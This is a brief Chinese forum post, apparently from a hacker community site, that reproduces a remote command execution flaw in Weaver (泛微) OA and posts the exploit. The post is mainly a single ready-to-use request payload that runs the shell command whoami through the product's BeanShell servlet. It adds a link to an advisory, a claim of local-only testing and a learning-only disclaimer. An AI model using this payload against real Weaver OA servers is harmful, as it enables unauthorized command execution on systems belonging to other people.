「复现」泛微OA远程命令执行复现（附EXP）

Te5tB99

        突然想说点什么，但又一时想不起要说什么，新年快乐吧。


        正文：
        漏洞详情请传送至
「漏洞预警」泛微OA 远程代码执行漏洞安全预警（附EXP）
https://ihonker.org/thread-29947-1-1.html
(出处: 中国红客联盟 - 08安全团队)

不讲那么多，直接步入正题了；简单明了，看图。

首先声明，因为未获得其他站点的授权，所以在本地测试。

送上EXP：
                泛微oa exp

bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw


附张图



声明：
此帖内容仅供学习讨论，禁止用于非法用途。如有违反法律规定，与ihonker.org无关